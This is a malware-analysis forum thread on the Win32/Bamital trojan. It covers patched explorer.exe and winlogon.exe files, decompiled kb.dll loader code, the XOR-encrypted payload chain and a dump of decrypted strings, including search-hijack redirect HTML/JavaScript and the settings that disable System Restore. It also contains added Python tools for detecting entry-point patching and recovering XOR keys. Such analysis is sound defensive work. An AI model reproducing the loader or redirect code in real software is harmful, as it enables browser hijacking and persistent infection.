Win32/Bamital

Forum for analysis and discussion about malware.
markusg
Posts: 733
Joined: Mon Mar 15, 2010 2:53 pm

Win32/Bamital

Post by markusg » Sat Dec 11, 2010 1:47 pm

Hi,
Is Trojan.Kordeef a new one? I could not find any info.
I removed 2 patched system files, winlogon and explorer.exe, from the infected machine.
files attached.
http://www.virustotal.com/file-scan/rep ... 1292072505
http://www.virustotal.com/file-scan/rep ... 1292072830

4everyone
Posts: 28
Joined: Fri Jul 16, 2010 1:59 am

Re: Trojan.Kordeef  (patched files)

Post by 4everyone » Sat Dec 11, 2010 2:23 pm

Bamital used to patch Winlogon.exe & Explorer.exe. Trojan.Kordeef looks new to me. Let me check whether I can find any difference between Bamital & Kordeef :)

BTW,

Bamital posts can be found here..

http://www.kernelmode.info/forum/viewto ... ital#p2095

EP_X0FF
Global Moderator
Posts: 4806
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation

Re: Trojan.Kordeef  (patched files)

Post by EP_X0FF » Sat Dec 11, 2010 5:22 pm

Is there any kb.dll available? :)
I see it loads it at the overwritten entry point (explorer.exe)
Ring0 - the source of inspiration
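The post above points at the overwritten entry point of the patched explorer.exe. The following is an added triage example (not code from the thread or from the malware) that parses a PE header with nothing but the standard library, finds the section that contains AddressOfEntryPoint, and flags the signs a file infector leaves when it redirects the entry point into appended code: an entry section that is not marked as code, that is writable and executable, or that is the trailing section instead of .text. The two PE images it checks are constructed in the script itself (headers only, no real code) and are not Bamital samples; the section name ".patch" and the RVAs are made up.

```python
import struct

# Section characteristic flags from winnt.h
IMAGE_SCN_CNT_CODE    = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ    = 0x40000000
IMAGE_SCN_MEM_WRITE   = 0x80000000


def entry_point_section(data):
    """Locate AddressOfEntryPoint in the section table.

    Returns (name, characteristics, index, section_count); name is None when
    the entry RVA falls outside every section.
    """
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("bad PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]        # NumberOfSections
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]   # SizeOfOptionalHeader
    opt_off = e_lfanew + 24
    if struct.unpack_from("<H", data, opt_off)[0] not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic")
    entry = struct.unpack_from("<I", data, opt_off + 16)[0]       # AddressOfEntryPoint (same offset in PE32 and PE32+)
    sec_off = opt_off + opt_size
    for i in range(nsec):
        (name, vsize, va, rawsize, _rawptr, _relocs, _lines, _nrelocs, _nlines,
         flags) = struct.unpack_from("<8sIIIIIIHHI", data, sec_off + 40 * i)
        if va <= entry < va + max(vsize, rawsize):
            return name.rstrip(b"\x00").decode("ascii", "replace"), flags, i, nsec
    return None, 0, -1, nsec


def suspicious_entry_point(data):
    """Return the reasons (empty list if none) the entry point looks tampered with."""
    name, flags, idx, nsec = entry_point_section(data)
    if name is None:
        return ["entry point outside every section"]
    reasons = []
    if not flags & IMAGE_SCN_CNT_CODE:
        reasons.append("entry section %s is not marked as code" % name)
    if flags & IMAGE_SCN_MEM_WRITE and flags & IMAGE_SCN_MEM_EXECUTE:
        reasons.append("entry section %s is writable and executable" % name)
    if nsec > 1 and idx == nsec - 1 and name != ".text":
        reasons.append("entry point in trailing section %s, typical of appended code" % name)
    return reasons


def build_sample_pe(entry_rva, sections):
    """Constructed test input: a PE32 header with the given section table and no code."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", e_lfanew)
    opt_size = 224
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)         # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)    # AddressOfEntryPoint
    table = b"".join(struct.pack("<8sIIIIIIHHI", n, size, va, size, 0, 0, 0, 0, 0, fl)
                     for n, va, size, fl in sections)
    return dos + b"PE\x00\x00" + coff + bytes(opt) + table


# Constructed section layouts (made up, not taken from a real explorer.exe)
_STOCK = [(b".text", 0x1000, 0x3000, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
          (b".data", 0x4000, 0x1000, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
          (b".rsrc", 0x5000, 0x1000, IMAGE_SCN_MEM_READ)]
CLEAN_SAMPLE = build_sample_pe(0x1200, _STOCK)
# Entry point redirected into an appended RWX section, as a file infector would do
PATCHED_SAMPLE = build_sample_pe(0x6010, _STOCK + [(b".patch", 0x6000, 0x200,
                                 IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE |
                                 IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)])

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_SAMPLE), ("patched", PATCHED_SAMPLE)):
        print(label, entry_point_section(blob)[0], suspicious_entry_point(blob))
```

Caveat: these header heuristics only catch an entry point that was moved. If the infector instead overwrites the bytes at the original entry address inside .text (the wording "overwritten entry point" can mean either), the header stays clean and only a comparison against a known-good copy or hash of the system file, or a look at the disassembly at the entry RVA, shows the patch.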

markusg
Posts: 733
Joined: Mon Mar 15, 2010 2:53 pm

Re: Trojan.Kordeef  (patched files)

Post by markusg » Sat Dec 11, 2010 6:31 pm

Sorry, yes :-)

EP_X0FF
Global Moderator
Posts: 4806
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation

Re: Trojan.Kordeef  (patched files)

Post by EP_X0FF » Sun Dec 12, 2010 3:50 am

Sorry, but there also seems to be another file named C:\WINDOWS\system32\dll
Can you please upload it? :)


// Decompiler output for the entry point of kb.dll
BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
  void *pCode;
  if ( fdwReason == DLL_PROCESS_ATTACH )   // == 1
  {
    // read the raw file into executable memory...
    pCode = ReadExecutableCode("C:\\WINDOWS\\system32\\dll");
    if ( pCode )
      // ...and jump straight into it, passing its own address in ECX
      ((void (__thiscall *)(_DWORD))pCode)(pCode);
  }
  return 0;   // FALSE: the loader unmaps kb.dll again, but the payload has already run
}
Ring0 - the source of inspiration

markusg
Posts: 733
Joined: Mon Mar 15, 2010 2:53 pm

Re: Trojan.Kordeef  (patched files)

Post by markusg » Sun Dec 12, 2010 10:34 am

OK, there is another one.

EP_X0FF
Global Moderator
Posts: 4806
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation

Re: Trojan.Kordeef  (patched files)

Post by EP_X0FF » Sun Dec 12, 2010 10:48 am

Maybe I should be more clear regarding this http://www.kernelmode.info/forum/viewto ... 3943#p3943 :)

The code above is exactly what this kb.dll, loaded by the patched explorer.exe, is doing.

kb.dll reads file named C:\WINDOWS\System32\dll and then executes it.

That's why I'm asking about this file: it can help to understand how this whole puzzle works :)
Ring0 - the source of inspiration

markusg
Posts: 733
Joined: Mon Mar 15, 2010 2:53 pm

Re: Trojan.Kordeef  (patched files)

Post by markusg » Sun Dec 12, 2010 10:55 am

OK, sorry. I understood it wrong; I first have to search for this file. It's not removed yet. Give me a bit of time :-)

markusg
Posts: 733
Joined: Mon Mar 15, 2010 2:53 pm

Re: Trojan.Kordeef  (patched files)

Post by markusg » Sun Dec 12, 2010 5:26 pm

I found what is perhaps a dropper on another PC.
It creates the same dll files.

EP_X0FF
Global Moderator
Posts: 4806
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation

Re: Trojan.Kordeef  (patched files)

Post by EP_X0FF » Sun Dec 12, 2010 5:53 pm

Yes, you're right, this is the dropper.

Dropper VT result
http://www.virustotal.com/file-scan/rep ... 1292176900

C:\Windows\System32\dll is the payload code, encrypted by XOR.

Once the infected explorer.exe starts, it loads kb.dll, which reads C:\windows\system32\dll, and then kb.dll executes it.

Infected Explorer.exe/Winlogon.exe --> C:\Windows\system32\kb.dll --> Read/Execute --> C:\Windows\System32\dll --> Decrypt/Execute --> Profit :)

The new code decrypts itself in a simple loop

[image: the self-decryption loop]

and then executes all the rest.

String data from decrypted "dll"
15 X_if _if c h r o m e . e x e f i r e f o x . e x e o p e r a . e x e i e x p l o r e . e x e GET HTTP/1.1
Host: &version= Run Software\Microsoft\Windows\CurrentVersion\Explorer\LowRegistry Flag GetUserGeoID SYSTEM\CurrentControlSet\Services\sr\Parameters
SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore FirstRun DisableSR \user32.dll kb.dll k b . d l l
\updhlp.dat open -new-window <script src="http:// " type="text/javascript"></script> Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
19792079 [%subid] <d> </d> <m> </m> <e> </e> <f> </f> <j> </j> <c> </c> <u> </u> <t> </t> <p> </p> <k> </k> <b> </b> <p> </p> <k> </k> [%key] [%subid] </ul>
google.com/ Date: X55 Fut 2999 </title> <r> </r> **http%3a// User-Agent: Accept-Encoding: Content-Type: text/html GET /search GET /s? google. search.yahoo.com
bing.com ?subid= &id= .info/message.php \temp.ini \user32.dll TimeGetWork Uses32 ExitTime Ver Decode Domen Flags \admin.txt .gif .jp .png .js .ico .css .aspx /
iexplore.exe .upd & q= p= text= "> % <d> </d> <s> </s> <i> </i> &HTTP_REFERER= \ PROCESSOR_IDENTIFIER &os= &br= IE Op FF Ch &flg= &ad= &ver= \server.dat \Windows
\winhelp.exe Exists555 Explorer555 Global\EventHlpFile Global\EventHlpFile2 HlpMap555
<title> - porno yschttl spt" href="http:// <div><a href="http://rds.yahoo.com <em> </em> <a href="http:// sb_tlst"><h3><a href="http://
class="sb_ads <a href="http:// " <em> </em> 19091979 \Server HTTP/1.1 302 Moved Temporarily
Location: Connection: keep-alive
Content-Length: 0
Connection: close
HTTP/1.1 200 OK
<html><head><script language="JavaScript">function f(){var form = document.forms["rr"];form.submit();}if(document.cookie=="")
{if (history.length!=0) document.cookie="k=1";window.onload=f;}else{document.cookie="k=1;expires=Mon, 01-Jan-2001 00:00:00 GMT";history.back();}</script></head><body><form action="http:// " method="post" name="rr"></form></body></html> 8 / <html><head></head><body><script type="text/javascript">location.href="http:// ";
</script></body></html> N0
<title> </title> <meta keyword > </head> Content-Length: Accept-Encoding: </body> </html> Host: Referer: http:// gzip sdch none HTTP/1. 200 OK _
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Decrypted stuff attached.
Ring0 - the source of inspiration
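The post above says the "dll" payload is XOR-encrypted and decrypts itself in a simple loop, and its string dump gives an analyst plenty of known plaintext (browser process names, kb.dll, updhlp.dat). The following is an added example, not code from the thread or from the sample, of how to recover such a blob without stepping through the loop: crib-drag each known string across the ciphertext, keep every alignment whose recovered key stream is periodic, and score each candidate key by how many of the known strings the decrypted buffer exposes. The thread does not state Bamital's key size or loop details, so this assumes a short repeating-key XOR; the 3-byte key and the padded sample buffer are constructed here for the demonstration and are not the real C:\Windows\System32\dll.

```python
# Cribs taken from the string dump in the post above
KNOWN_STRINGS = [b"chrome.exe", b"firefox.exe", b"opera.exe",
                 b"iexplore.exe", b"kb.dll", b"updhlp.dat"]


def xor_bytes(data, key):
    """Repeating-key XOR; the same function encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def candidate_keys(cipher, crib, max_keylen=8):
    """Crib-drag: assume `crib` occurs somewhere in the plaintext, slide it over
    the ciphertext, and keep every alignment whose implied key stream repeats
    with a period of 1..max_keylen bytes."""
    keys = set()
    n = len(crib)
    for pos in range(len(cipher) - n + 1):
        frag = bytes(c ^ p for c, p in zip(cipher[pos:pos + n], crib))
        for klen in range(1, min(max_keylen, n) + 1):
            if all(frag[i] == frag[i % klen] for i in range(n)):
                # frag[i] is key[(pos + i) % klen]; rotate it back to offset 0
                keys.add(bytes(frag[(j - pos) % klen] for j in range(klen)))
                break   # smallest period only; its multiples would be duplicates
    return keys


def recover(cipher, cribs=KNOWN_STRINGS, max_keylen=8):
    """Try every candidate key and keep the one exposing the most known strings.
    Returns (score, key, plaintext); key is None if no crib fits anywhere."""
    best = (0, None, None)
    for crib in cribs:
        for key in candidate_keys(cipher, crib, max_keylen):
            plain = xor_bytes(cipher, key)
            score = sum(plain.count(s) for s in cribs)
            if score > best[0]:
                best = (score, key, plain)
    return best


# Constructed sample (not the real payload): the known strings padded with
# filler bytes and encrypted under an assumed 3-byte key.
_PLAIN = (b"\x00" * 16
          + b"chrome.exe\x00firefox.exe\x00opera.exe\x00iexplore.exe\x00"
          + b"\x90" * 8 + b"kb.dll\x00\\updhlp.dat\x00" + b"\xcc" * 8)
_ASSUMED_KEY = b"\x5a\x13\xc7"
SAMPLE_CIPHER = xor_bytes(_PLAIN, _ASSUMED_KEY)

if __name__ == "__main__":
    score, key, plain = recover(SAMPLE_CIPHER)
    print("key:", key.hex() if key else None, "strings matched:", score)
    print(plain)
```

Usage note: the spaced rendering "c h r o m e . e x e" in the dump means some of those strings are stored as UTF-16, so when running this against a real blob add `s.decode().encode("utf-16-le")` variants of the cribs to the list. If no key of length up to `max_keylen` scores above 1, the loop is probably not a plain repeating XOR (a rolling or position-dependent key, for instance) and the decryption routine itself has to be lifted from the disassembly.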
